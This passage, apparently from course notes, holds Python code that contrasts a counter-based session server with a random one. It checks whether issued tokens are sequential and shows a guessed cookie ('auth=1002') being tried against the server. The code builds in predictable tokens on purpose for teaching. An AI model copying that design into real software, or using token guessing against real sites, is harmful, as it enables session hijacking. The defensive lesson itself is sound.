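        if USERS.get(user) != pwd:
            return None
        val = secrets.token_urlsafe(32)
        self._sessions[val] = user
        return val


def looks_sequential(vals) -> bool:
    """Audit helper: do consecutively issued authenticators differ by 1?"""
    try:
        nums = [int(v) for v in vals]
    except ValueError:
        return False
    return len(nums) > 1 and all(b - a == 1 for a, b in zip(nums, nums[1:]))


def serve_restricted(server, cookie_header: str) -> str:
    """GET restricted.html: read auth=val from the Cookie header, ask the
    auth server whether val is live, and answer as the slide-61 diagram does."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get("auth")
    user = server.check(morsel.value) if morsel else None
    return f"200 OK restricted.html for {user}" if user else "403 Forbidden"


if __name__ == "__main__":
    for server in (CounterAuthServer(), RandomAuthServer()):
        first = server.login("alice", "s3cret")
        second = server.login("alice", "s3cret")
        print(type(server).__name__, "issued", first, "then", second,
              "| sequential:", looks_sequential([first, second]))
        print("  ", serve_restricted(server, f"auth={first}"))
        print("  ", serve_restricted(server, "auth=1002"))
```

Unpredictability is necessary but not sufficient: the authenticator also needs an expiry, should be replaced on login (fixation), and, as slide 44 notes, should be marked HttpOnly so a script cannot read it.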

